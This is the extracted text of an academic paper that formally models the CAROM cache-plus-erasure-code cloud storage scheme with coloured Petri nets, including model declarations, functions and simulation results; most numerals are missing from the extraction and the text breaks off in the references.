http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ form of a subscription. with internet access growth, cloud computing is emerging in the industry, academia, and society. due to a large number of resources, the cloud uses virtualization for resource management. further, clouds need to stimulate data centers’ design so that data can be readily available to users anywhere in the world (buyya et al., ). services there are four different services in cloud computing. software as a service software as a service (saas) is a multi-tenant platform that enables cloud users to deploy their applications to the hosting environment. further, it supports different cloud applications in a single logical environment to achieve optimization in terms of speed, security, availability, scalability, and economy (dillon, wu & chang, ). platform as a service platform as a service (paas) facilitates the cloud user to organize, develop and manage various applications through a complete “software development lifecycle”. further, it also eliminates the requirement of an organization to traditionally build and maintain the infrastructure, to develop applications (sajid & raza, ). by using saas, cloud users can host different applications while paas offers a platform to develop different applications (dillon, wu & chang, ; sajid & raza, ). infrastructure as a service it offers direct access to resources such as storage, computer, and network resources used for processing (dillon, wu & chang, ). infrastructure as a service (iaas) sets up an independent virtual machine (vm) to transform the architecture of the application so that multiple copies can be executed on a single machine. moreover, it provides access to the infrastructure and delivers additional storage for network bandwidth of the corporate web servers and data backups. an important feature of iaas is that extensive computing can also be switched on, which previously was only accessible to people with the facility of high power computers. database as a service database as a service (daas) is a self-service cloud computing model. in daas, user request database services and access to the resources. daas provides a shared, consolidated program to provide database services on a self-service model (mateljan, Čišić & ogrizović, ). deployment models based on environmental parameters including openness, storage capacity and proprietorship of the deployment infrastructure, one can choose a deployment model from the types of cloud deployment models given below. the following are the types of cloud computing available in the literature. rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ public cloud generally, public clouds may be owned and managed by academic or government organizations and it is used by common users and the public. in the traditional regular sense, in public cloud sources, the internet is delivered dynamically and based on self-service via the internet by an external supplier who shares resources (ahmed et al., ). moreover, security issues occur in such types of clouds and are more prone to attack. that is why the user has access to the public cloud via the correct validations (sajid & raza, ). private cloud such kind of infrastructure only works for a specific organization while off-premise private cloud is used by one company and the infrastructure is implemented by another company (ahmed et al., ). there is no restriction of network bandwidth, security risks, and legal requirements in a private cloud, and data is managed within the organization, which is not permitted in a public cloud (kamboj & ghumman, ). hybrid cloud it is a combination of two or more separate cloud infrastructures (public or private) and forms another type of cloud, the so-called hybrid cloud. this concept is also known as cloud bursting where several integrated cloud infrastructures remain unique entities (mell & grance, ). hybrid cloud facilitates organizations to shift overflow traffic to the public cloud to prevent service interruption. federated cloud to handle the site failure, cloud infrastructure providers have established different data centers at different geographic locations to ensure reliability. however, this approach has many shortcomings, one problem is that the cloud users may find it difficult to know which remote location is best for their application to host. cloud service providers have a finite capacity and it is difficult for a cloud infrastructure provider to set up different data centers at different geographic locations. this is why different providers of cloud services fall under one umbrella and form a federated cloud (varghese & buyya, ). in times of work overload, cloud federation offers the opportunity to avail available computational, cost-effective, on-demand, and reliable storage options to other cloud service providers (buyya, ranjan & calheiros, ). for example, an eu-based egi federated cloud shares data centers with cloud providers. issues current data centers are hosting multiple applications having time latency from a few seconds to multiple hours (patterson, ). the main focus of cloud computing is to provide a performance guarantee and to take care of data privacy. with the high growth rate of data on the cloud, more massive servers’ need is rising day by day. demand for higher performance is being fulfilled by replicating data in multiple data centers worldwide without thinking about energy consumption. further, on average, every data center utilizes as much energy as , households. data centers are costly and unfavorable for the rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ environment, as they emit more carbon than both argentina and the netherlands (patterson, ). need of cache-a replica on modification cache-a replica on modification (carom) is a hybrid cloud file system that merges the benefits of both replication and erasure codes. figure reflects the process flow of carom. carom has a cache at each data center. cache points out the local access, and every data center performs as a primary data center. the data object which is frequently accessed is stored in the cache to avoid the extra computational cost. in contrast, those objects that are accessed rarely are divided into m data chunks. further, distribute them among n + k data nodes, tolerate k failures, and take the storage cost to a minimum and make the data center environment friendly (ma et al., ). contribution of research formal methods are mathematical methods used to model or specify any system. petri net provides strong mathematical and graphical representations to incorporate concurrency, sequential execution, conflicts, determinism, resource sharing, timing information, communication, synchronization, and distribution in the underlying system. this paper's primary goal is to develop a data scheduling model based on colored petri net (cpn), which utilizes carom to reduce storage cost and bandwidth latency. statistical analysis is provided to elucidate the performance of the model. simulation is performed, and verification is also presented of the proposed model. the rest of the article is organized as follows: “related work” presents related work. “colored petri nets” presents basic terminology, notations, and graphical convention about petri nets. “formal model of carom” presents the formal modeling of the carom based data scheduling framework. “simulation” presents a formal analysis of the figure carom process flow. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ developed model. “analysis” presents the simulations, its results, and the discussion on it. “conclusion” concludes our work and gives final thoughts about the strengths and weaknesses of our approach. related work in the cloud, resource scheduling is a challenging field (mathew, sekaran & jose, ). magnificent work has been done in resource scheduling in the cloud. some approaches are relevant to resource scheduling in the cloud. this approach’s immediate attention is to optimize time performance, like completion time, total delay, and response time (mathew, sekaran & jose, ). zhan et al. ( ) provides a detailed survey of cloud computing. ant colony optimization algorithm for scheduling tasks according to budget is presented in zuo et al. ( ). in adil et al. ( ), a heuristic algorithm is proposed for task scheduling. kumar & verma ( ) presents a genetic algorithm to schedule independent tasks. in mateescu, gentzsch & ribbens ( ), another genetic algorithm is presented that improves the makespan of resources. the authors of de assunção, di costanzo & buyya ( ) proposed an architecture that provides a platform for scientifically, high performance (hpc) applications. the cornerstone of the proposed architecture is the elastic cluster, which expands the hybrid cloud environment (de assunção, di costanzo & buyya, ). researchers in mastelic et al. ( ) analyzed the assessment between performance and usage costs of various facilities algorithms for using resources from the cloud to expand a cluster capacity. the authors in javadi, abawajy & buyya ( ) propose non-disruptive source facilities policies for hybrid cloud environments that they have evaluated using a model-based simulation instead of our real case study performance evaluation. researchers in mattess, vecchiola & buyya ( ) present a facility algorithm for expanding cluster capacity with amazon ec spot organizations. research work in yuan et al. ( ) provides a profit maximization model for private proposals cloud providers using the temporal variation of prices in a hybrid cloud. although they are similar to many others, they take time, and data and networks’ costs are negligible. however, all the algorithms in the literature were limited to static resources only. with the revolution of cloud computing, the number of data servers is increasing across the world. the construction of the data center is not only cost-effective but also not in favor of the environment. much focus is given to energy-optimized resource scheduling in cloud computing. the researcher has proposed an aware energy model in the form of directed acyclic graphs in gan, huang & gao ( ). in zhao et al. ( ), two fitness functions are defined: job completion time and energy. a researcher in shen et al. ( ) proposed a resource allocation technique that allocates resources to virtual machines taking care of energy. dvfs method has been presented in hosseinimotlagh, khunjush & samadzadeh ( ), which schedules a single task and takes care of the voltage supply. one researcher in wu, chang & chan ( ) has presented a virtual machine scheduling algorithm that achieves energy optimization and reduces host temperature. in mhedheb et al. ( ), a method is presented to reduce both network and server power. research work in xia et al. ( ) scaled the voltage to rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reduce energy costs. scaled processor utilization and resource consolidation has been presented in lee & zomaya ( ) for energy optimization. all these methods focus on reducing the cost of energy without the care of job completion time. in beloglazov, abawajy & buyya ( ), the researcher proposed energy- aware mapping of vms to cloud servers as a problem with bin-packing, independent of the types of workload. klein et al. ( ) presented a framework of brownout for energy optimization. all users have to bear either time latency or cost on a cloud file system. colored petri nets petri nets are bipartite directed graphs with the power of behavioral analysis of the modeled system through it. cpn is a mathematical technique used for modeling parallel systems and graphical analysis of their characteristics (jensen, ; milner, ; ullman, ). cpn is the combination of petri net and standard ml (emerson & sistla, ; virendra et al., ). cpn allows defining some user-defined data types along with some standard declarations. it is a general-purpose modeling language and has the power to model parallel systems and analyze their performance. formal definition of cpn is presented below (jensen & kristensen, ): a net is a tuple n = (p, t, a, Σ, c, n, e, g, i) where: p is a set of places. t is a set of transitions. a is a set of arcs where p ∪ t=p ∩ a=t ∩ a=Ø Σ is a set of color sets c is a color function, that is, c: p → Σ n is a node function. it maps a into (p × t) ∪ (t × p). e is an arc expression function. it maps each arc a ∈ a into the expression e. g is a guard function. it maps each transition t ∈ t to a guard expression g. the output of the guard expression should evaluate to boolean value: true or false. i is an initialization function. it maps each place p into an initialization expression i. we can map each place into a multi-set of tokens in cpn through a mapping function called marking. initial marking reflects the initial state of a model. final marking represents the final state of the system. formal model of carom for modeling, high-level architecture and the components of the system are identified in the first phase. after that, the identified components’ interaction points are defined for the smooth implementation of the component-based architecture. further, a mixture of top-down and bottom-up approaches is adopted in this paper to model the framework. carom uses some part of the local storage disk as a cache. whenever a written request of a new file is received, the complete file is stored in the reserved memory of each dc named as cache.whenever the cache is near to be filled, the file least recently used is removed from the cache. it is distributed on n + k data nodes after dividing into n chunks. however, suppose a read request for a file is received. in that case, it is checked first in the nearest dc. if it is found, then it is downloaded directly, without any computational rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cost. whenever a request of that file is received that is not available in the cache. data is regenerated from n data nodes out of n + k (ma et al., ). the strategy discussed above is presented in the form of a flow chart (see fig. ). hierarchical view of model figure depicts the hierarchical view of the model. figure file access process flow of carom. full-size doi: . /peerj-cs. /fig- figure hierarchical view of the model. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ colored petri nets model in order to model the carom based framework using cpn, the components sender, data center, and receiver are developed. the data center component is further extended to cache and datanode sub-components, as shown in fig. . table represents the color sets used in the model. as data types, the color sets are mapped to the places of the model given in fig. . for instance, color set no, in the third row of table , is mapped to the place key while color set data, in the fourth row of table , is mapped to the place next_key in the cpn model shown in fig. . moreover, product type color sets are constructed by taking the cartesian product of the color sets. for instance, the color set request in table is constructed using color sets no, data, op and no. table represents the list of variables used in the model. a variable v is used in the arc inscription, and type[v] ∈ Σ, to fetch the data from the place. further, the variables construct arc expression, which is assigned to arc a through arc expression function figure top level view of proposed scheme. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ e: a→exprv while type[e(a)] = c(p)ms where expr is the set of expressions and ms is a multiset. a marking is a function m that maps each place p ∈ p into a multiset of tokens, that is, m(p) ∈ c(p)ms. table shows values (tokens) to represent the initial marking. arc expressions are evaluated by assigning the values to the variables in the expressions. table color sets of the model. color set defination colset unit = unit; unit color set colset bool = bool; boolean color set colset toa = int; closet no = int; integer color sets colset data = string timed; timed string color set colset op = string timed; timed string color set colset request = product no × data × op × no timed; timed product of color set no of type int, color set data of type string, color set op of type string and color set no of type int. colset file= product no × data × toa timed; timed product of color set no of type int, color set data of type string and color set toa of type int. colset nd=product no × data timed; timed product of color set no of type int and color set data of type string. colset rr=product no × no timed; timed product of color set no of type int and color set no of type int. colset rrl=list rr timed; timed list of color set rr. colset nkd=product no × no × data; product of color set no of type int, color set no of type int and color set data of type string. colset recdata = list nkd timed; timed list of color set nkd. colset packet = union data:nkd timed ; union of type data(int*int*string), colset senddata= product no × no × data timed; timed product of color set no of type int, color set no of type int and color set data of type string. colset sendlist=list senddata timed; timed list of color set senddata. colset cache = product no × data × no timed; timed product of color set no of type int, color set data of type string and color set no of type int. colset cachelist = list cache timed; timed list of color set cache. colset cachehit= product no × cachelist timed; timed product of a color set no of type int and color set cachehit of type list. colset rcvsplit = product no × packet; product of color set no of type int and color set packet of type union. colset packet=list packet timed; timed list of color set packet of type union. table variables of the model. variable defination var p:packet; variables of colour set packet. var pak:packet; variable of colour set packet. var d,data,next:data; variables of colour set data. var n,n ,id,k,k ,x ,x ,x :no; variables of colour set no. var cl:cachelist; variables of colour set cachelist. var sl:sendlist; variable of colour set sendlist. var c:cache; variable of colour set cache. var rd,sd:recdata; variables of colour set recdata. var req,e:request; variables of colour set request. rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ further, expressions can be converted into functions to be mapped to arcs. table represents the functions used in this model. main module we first identified high-level components of the system, and then each component is step-wise refined. for such a purpose, hierarchical colored petri nets are appropriate formalism to make the model more straightforward and understandable. figure depicts the top-level view of the model. this is a hierarchical model in which multiple substitution transitions connect with places. a substitution transition has its own definition. therefore, groups are identified from the detailed petri net model and converted into substitution transitions. there are twenty places and ten transitions, including seven substitution transitions, named cache, store-db, db , db , db , regenerate-data and receiver. cache module this module aims to decide whether the data will be directly available from cache or reconstruct it from n different data centers. figure shows the cpn cache module, and it has ten places and four transitions. two places are in-sockets and six are out-sockets. whenever a token is added in the place “check cache” with operation value “read”, it is sent to transition “cache checked”, which also receives a “cachelist” from the place “cache”. function member is a boolean function. it returns true if the key of token coming from the place “check cache” is found from cachelist (see table for all declared functions). if member function returns true, then the function retrieve will get the data against key from the cache. further, the function sends data to place “cache hit” and restores that data object in the cache. in contrast, function updatelife will increment the value of the life of this object by . on the other side, if the function member returns false, then the key is sent to all available data centers through “cachemiss”. whenever a token is reached in place “send to cache” with operation value “write”, it causes enabling of the transition “store_in_cache” which can only be fired when the cache is not full. moreover, if the cache is not full and no data object is found with the same key, then token is sent to place “cache” and inserted on the head of the cachelist. however, if the cache is full, then the token waits in place “send to cache” until the function sort arranges the cachelist with respect to life of data objects. further, the data object having the least life is removed from cache, and it is sent to place “split & distribute”. if the table initializations of the model. initial marking val db = `[data( , ,"c"),data( , ,"o"),data( , ,"e"),data( , ,"p")]@ ; val db = `[data( , ,"o"), data( , ,"u"),data( , ,"d"),data( , ,"e")]@ ; val db = `[data( , ,"l"),data( , ,"r"),data( , ," "), data( , ,"t")]@ ; val allrequest= `( ,"col","write", )@ +++ `( ,"our","write", )@ +++ `( ,"ed ","write", )@ +++ `( ," ","read", )@ +++ `( ," ","read", ) @ +++ `( ,"pet","write", )@ +++ `( ,"ri ","write", )@ +++ `( ," ","read", )@ ; rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table functions of the model. function purpose fun check(n,k) = if(n>k) then n else k; enable transition if first token has greater value fun wait() = discrete( , ); wait for a random time unit between and fun check (n,k) = if n=k then k+ else k; increment if both tokens have same value fun success() = discrete( , )<= ; to check either random number is less than fun success (n,d) = if success() then `(n,d) else empty; enable transition if random number is less than fun success (k) = if success() then `k else empty; enable transition if random number is less than fun transmit(n,k,d) = if n=k then `d else empty; enable transition if both tokens have same value fun transmit (n,k) = if n>k then `k else empty; enable transition if first token has greater value fun read(req:request) = if # (req)="read" then `(# (req)) else empty; enable transition with st argument of request if rd argument of request is “read” fun write(req:request)= if # (req)="write" then `req else empty; enable transition with whole request if rd argument of request is “write” fun length [] = | length ( h :: t ) = +length t; return length of a list fun cachemember(req:request,[])=false | cachemember(req,(n,d, k)::t)=if(# (req))=n then true else cachemember(req,t); check either a file exist in cache or not fun store(req:request,cl:cachelist) = ifcachemember (req,cl) then cl else (# (req),# (req),# (req))::cl; store a file on cache fun member (k ,[]) = false | member (k ,(k ,v ,k )::t) =if k =k then true else member (k ,t); check either a token exist in a list or not fun member ((k,n,d),[])=false| member ((k,n,d),(k ,n ,d )::t)=if k=k andalso n=n andalso d=d then true else member ((k,n,d),t); check either a token exist in a list or not fun remdup((k,n,d),sd)= if member ((k,n,d),sd) then sd else (k,n,d)::sd; remove duplications fun insert((k,n,d),[])=[(k,n,d)] | insert((k,n,d),(k ,n ,d )::t)=if n<=n then (k,n,d)::(k ,n ,d )::t else (k ,n ,d )::insert((k,n,d),t); insert in a list fun insert ((n,d,k),[])=[(n,d,k)] | insert ((n,d,k),(n ,d ,k )::t)=if k<=k then (n,d,k)::(n ,d ,k )::t else (n ,d ,k )::insert ((n,d,k),t); insert in a list fun insert ((k,n,d),[])=[(k,n,d)] | insert ((k,n,d),(k ,n ,d )::t)=if n<n then (k,n,d)::(k ,n ,d )::t else (k ,n ,d )::insert ((k,n,d),t); insert in a list fun sort[] = [] | sort ( (n,d,k)::t)= insert ((n,d,k),sort t); sort with respect to least frequently used fun sort []=[] | sort ((k,n,d)::t) = insert ((k,n,d),sort t); sort with respect to least frequently used fun member (k ,[])=false | member (k ,(k,k ,v )::t)= if k =k then true else member (k ,t); check either a token exist in a list or not fun recdata(k,n ,d,rd)=if member (n ,rd) then rd else insert((k,n , d),rd); reconstruct data fun checkdb(k,[])=false | checkdb(k,data(k ,k ,v)::t) = if k=k then true else checkdb(k,t); check data in data base fun recd (k,data(k ,k ,v)::t,rd,recdata)=if k=k then recdata(k ,k , v,rd) else recd (k,t,rd,recdata); enable transition if data is regenerated fun found(k,pak,rd,recd )=if checkdb(k,pak) then recd (k,pak,rd, recdata) else rd; enable transition if data is found in data base fun notfound(k,pak)=if checkdb(k,pak) then empty else `k; enable transition if data is not found in data base fun retrieve(k ,[]) = "not found" | retrieve (k ,(k ,v ,k )::t) = if k =k then v else retrieve(k ,t); retrieve data from data base (continued) rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cache is not full but the cachelist has a record with the same key, then token will be sent to place “already exist in cache” by firing the transition “send to cache”. store in db module figure shows the store in db module of the model. it has two places and one transition. one place is in-socket and one place is out-socket. whenever the cache is full, the data object with the least life is removed from the cache, and a token is added in the place “split & distribute”. this token enables the transition “split data”. then function split is table (continued). function purpose fun cachehit(member,retrieve,k,cl) = if member(k,cl) then `retrieve (k,cl) else empty; signal to show data is available in cache fun cachemis(member,k,cl)= if member(k,cl) then empty else `k; signal to show data is not available in cache fun sendtok(k ,k ,k ,k ) = if k ="write" then `(k ,k ,k ,k ) else `(k ,k ,k ,k ); enable either read or write transition fun updatelife(k,(k ,v ,k )::t) = if k=k then (k ,v ,k + ) ::t else updatelife(k,t); update frequency fun splitdata(n,d)= let val p = packetlength; fun splitdata (n,k,d) = let val d = string.size(d) in if d <=p then [(n,k,d)] else (n,k, substring (d, ,p )):: splitdata(n,k+ ,substring(d,p ,d -p )) end; in splitdata(n, ,d) end; split data fun split(k,data) = ( list.map(fn (n,n ,d)=>data(n,n ,d))(splitdata (k,data))); split data in n+k chunks figure cache module. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ called, which divides the data value into n data chunks. all the n chunks are sent to place “distribute” for distribution among n + k databases. db module this module is to retrieve the n data chunks from n + k data centers. db module contains three in-sockets and two out-sockets. figure illustrates the db module of the model. it has seven places and two transitions. three places are in-sockets, two places are out-sockets and one place is in-out-socket. whenever a token is reached in place “distribute”, it is stored in the database along with its unique key. whenever a token having a key is added in the place “cachemiss”, transition “getdata” will check the data chunks against that key. if it is found, then the data chunk and its key will be sent to place “reconstruct data”, which will get n data chunks from n + k data bases to re-generate the original data with the tolerance of k failures. regenerate data module this module is to combine n data chunks to reconstruct data into its original form. figure shows the regenerate-data module of the model. this module has nine places and four transitions. two places are in-out-sockets and four are out-sockets. in this module, when we need to reconstruct data the place “reconstruct_data” receives all data chunks against the search key from all available databases. transition “recd” remains enable until all data chucks move from place “reconstruct_data”. then, on arc between the transition “recd” and the place “rec” the function remdup (see table ) is called, and it removes all the duplications of data chunks. after that, the function sort is called. it sorts data chunks to recontruct the data. the place “reconstruct” holds the token with data in its original form. this place sends data the place “reg data”, which sends the data towards substitution transition “receiver”. figure store in db module. full-size doi: . /peerj-cs. /fig- figure db module. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ receiver module figure shows the receiver module. this module is to ensure that data is ultimately transmitted and received by the user. the receiver module has fifteen places and eleven transiotions. two places are in-sockets and one is out-socket. in this module, whenever a token is reached in place “y” or “cachehit” it is sent towards the place “send queue”. when token from the place “send queue” enables the transition “send ” then chances of figure regenerate data module. full-size doi: . /peerj-cs. /fig- figure receiver module. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ token lost are % over a network. if the token is lost, then place “timer” will receive the token. that token will be sent again to avoid the deadlock situation. if the token is sent to place c to enable the transition “receiver” then the transition sends data in place “response.” further, the transition “transmitack” sends acknowledgment towards the place “ack received”, which on receiving the token enables the transition “remove” which causes to remove that token from the place “sendqueue”. simulation numerous reenactment tools are used to demonstrate and execute a framework, like, process model, socnetv, network workbench. however, it is essential to mention that cpn based formalism supports simulation through cpn tools. to check the behaviour of the proposed model, we run several manual and ten fully automated simulations of the proposed model with cpn tools. figure represents a partial simulation of the model through its intermediate marking (state). in order to get the average completion time of total requests to get both cached and non-cached data, ten simulations are performed (see table ). further, table shows that simulation gives the high completion time to get cached and non-cached data. analysis to analyze the performance of the proposed model, we performed the following: verification of model state-space analysis of the proposed model is performed to monitor the proposed strategy's possible behavior and amend them accordingly (see table ). figure partial simulation of the module. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performance analysis to evaluate the performance of the modeled strategy, average delay, throughput, and average queue lengths are collected by performing ten simulations of the model. for such purpose, monitors are applied on the transitions “check request”, “cache checked”, “split data”, “get data”, “reg data” and “receive” and places “cachehit”, “cachemis ”, “split”, “reconstruct data” and “response”. statistical analysis of output data is performed. standard behavioral properties and trace patterns generated by our model are analyzed by state space report. table illustrates the partial statistics generated by state space with s. it reveals that the occurrence graph (o-graph) has , nodes and , arcs. further, these statistics also depict the boundedness properties. the upper bound shows the maximum number of tokens in a place, while the lower bound shows the minimum number of tokens that can be added to a specific place. it shows that places table state space report of the model. statistics for o-graph state space state space nodes: arcs: secs: status: scc graph nodes: arcs: secs: boundedness properties best integer bounds upper lower cache ′ cache db ′ db main ′ check_cache main ′ request main ′ send_to_cache main ′ response network ′ next_receive network ′ next_send liveness properties dead markings [ , , , , : : : ] dead transition instances none live transition instances none fairness properties no infinite occurance sequences. rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cache, db , next_receive and next_send have both upper and lower bound , which means these places always have one token. however, the upper bound of the place “request” is , while it's lower bound is . further, place “response” has upper bound and lower bound equal to zero. it shows that at most requests from place “request” has been fulfilled and stored in place “response”. liveness properties disclose that there exist dead markings. dead markings are those markings that have no enabled binding elements. such dead markings are interpreted as final or terminal markings and not deadlock states of the modeled system. the state-space specifies that the model is partially correct and generated results are correct. therefore, the state-space analysis conveys that the modeled system behaves figure state space graph. full-size doi: . /peerj-cs. /fig- table completion time. completion time cached non cached simulation simulation simulation simulation simulation simulation simulation simulation simulation simulation rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ according to the requirements and the specifications. further, the model preserves the properties required for the utilization of storage resources. the full state space of cpn has , nodes and , arcs, which cannot be depicted in the reachability graph. therefore, fig. shows a graphical representation of state space from marking m –m by skipping some intermediate markings. in cpn tools, data collection monitors are applied to compute the average completion time. table depicts the average completion time of total requests to get both cached and non-cached data for ten simulations. figure also represents the completion time for each simulation performed. it shows that in each simulation, cached data takes less time than non-cached. therefore, it shows that the proposed approach improves storage resource utilization. further, it validates the precision of our approach. conclusion this research is about the issues of data storage and retrieval from cloud-based data centers. storage cost and bandwidth latency are the two major factors that influence the performance of a system. to reduce the bandwidth latency, most cloud service providers are using multiple copies of data, each on a separate data center across the world. moreover, data centers are expensive to build and also are unfriendly to the environment. erasure codes are the techniques that store data of n chunks in n + k data places. however, erasure codes need some extra computation time to regenerate the data. carom combined both techniques for dual benefits. this research formally modeled carom using cpn formalism. furthermore, we formally verified our model with space state analysis. moreover, we formally analyzed the performance of our model by performing several simulations using monitors in figure completion time. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cpn-tools. performance reports generated by cpn-tools show that the model outperforms the others. in the presented model, the cache size is fixed. the cache is replaced by using the least frequently used replacement algorithm. in the future, we will use some heuristic algorithms to resize and replace the cache in cloud-based systems. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � muhammad rizwan ali conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � farooq ahmad conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � muhammad hasanain chaudary performed the computation work, prepared figures and/or tables, and approved the final draft. � zuhaib ashfaq khan conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � mohammed a. alqahtani performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. � jehad saad alqurni performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � zahid ullah performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � wasim ullah khan performed the experiments, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: raw data are available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adil sh, raza k, ahmed u, ali ssa, hashmani m. . cloud task scheduling using nature inspired meta-heuristic algorithm. in: international conference on open source systems & technologies (icosst). piscataway: ieee, – . rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ahmed m, chowdhury asmr, ahmed m, rafee mmh. . an advanced survey on cloud computing and state-of-the-art research issues. ijcsi international journal of computer science issues ( ): – . beloglazov a, abawajy j, buyya r. . energy-aware resource allocation heuristics for efficient management of data centers for cloud computing. future generation computer systems ( ): – doi . /j.future. . . . buyya r, ranjan r, calheiros rn. . intercloud: utility-oriented federation of cloud computing environments for scaling of application services. in: international conference on algorithms and architectures for parallel processing, berlin: springer, – . buyya r, yeo cs, venugopal s, broberg j, brandic i. . cloud computing and emerging it platforms: vision, hype, and reality for delivering computing as the th utility. future generation computer systems ( ): – doi . /j.future. . . . de assunção md, di costanzo a, buyya r. . a cost-benefit analysis of using cloud computing to extend the capacity of clusters. cluster computing ( ): – doi . /s - - -x. dillon t, wu c, chang e. . cloud computing: issues and challenges. in: advanced information networking and applications (aina), th ieee international conference on, ieee, – . emerson ea, sistla ap. . symmetry and model checking. formal methods in system design ( ): – doi . /bf . gan gn, huang tl, gao s. . genetic simulated annealing algorithm for task scheduling based on cloud computing environment. in: intelligent computing and integrated systems (iciss), international conference on, ieee, – . hosseinimotlagh s, khunjush f, samadzadeh r. . seats: smart energy-aware task scheduling in real-time cloud computing. journal of supercomputing ( ): – doi . /s - - - . javadi b, abawajy j, buyya r. . failure-aware resource provisioning for hybrid cloud infrastructure. journal of parallel and distributed computing ( ): – doi . /j.jpdc. . . . jensen k. . coloured petri nets: basic concepts, analysis methods and practical use. vol. . berlin: springer science & business media. jensen k, kristensen lm. . coloured petri nets: modelling and validation of concurrent systems. berlin: springer science & business media. kamboj s, ghumman ns. . a survey on cloud computing and its types. in: rd international conference on computing for sustainable global development (indiacom). piscataway: ieee, – . klein c, maggio m, Årzén ke, hernández-rodriguez f. . brownout: building more robust cloud applications. in: proceedings of the th international conference on software engineering, acm, – . kumar p, verma a. . independent task scheduling in cloud computing by improved genetic algorithm. international journal of advanced research in computer science and software engineering ( ). lee yc, zomaya ay. . energy efficient utilization of resources in cloud computing systems. journal of supercomputing ( ): – doi . /s - - - . ma y, nandagopal t, puttaswamy kp, banerjee s. . an ensemble of replication and erasure codes for cloud file systems. in: infocom, proceedings. piscataway: ieee, – . rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.jpdc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mastelic t, oleksiak a, claussen h, brandic i, pierson jm, vasilakos av. . cloud computing: survey on energy efficiency. acm computing surveys ( ): – doi . / . mateescu g, gentzsch w, ribbens cj. . hybrid computing—where hpc meets grid and cloud computing. future generation computer systems ( ): – doi . /j.future. . . . mateljan v, Čišić d, ogrizović d. . cloud database-as-a-service (daas)-roi. in: the rd international convention mipro. piscataway: ieee, – . mathew t, sekaran kc, jose j. . study and analysis of various task scheduling algorithms in the cloud computing environment. in: icacci, international conference on advances in computing, communications and informatics. piscataway: ieee, – . mattess m, vecchiola c, buyya r. . managing peak loads by leasing cloud infrastructure services from a spot market. in: th ieee international conference on high performance computing and communications (hpcc). piscataway: ieee, – . mell p, grance t. . the nist definition of cloud computing. washington, d.c.: u.s. department of commerce. mhedheb y, jrad f, tao j, zhao j, kołodziej j, streit a. . load and thermal-aware vm 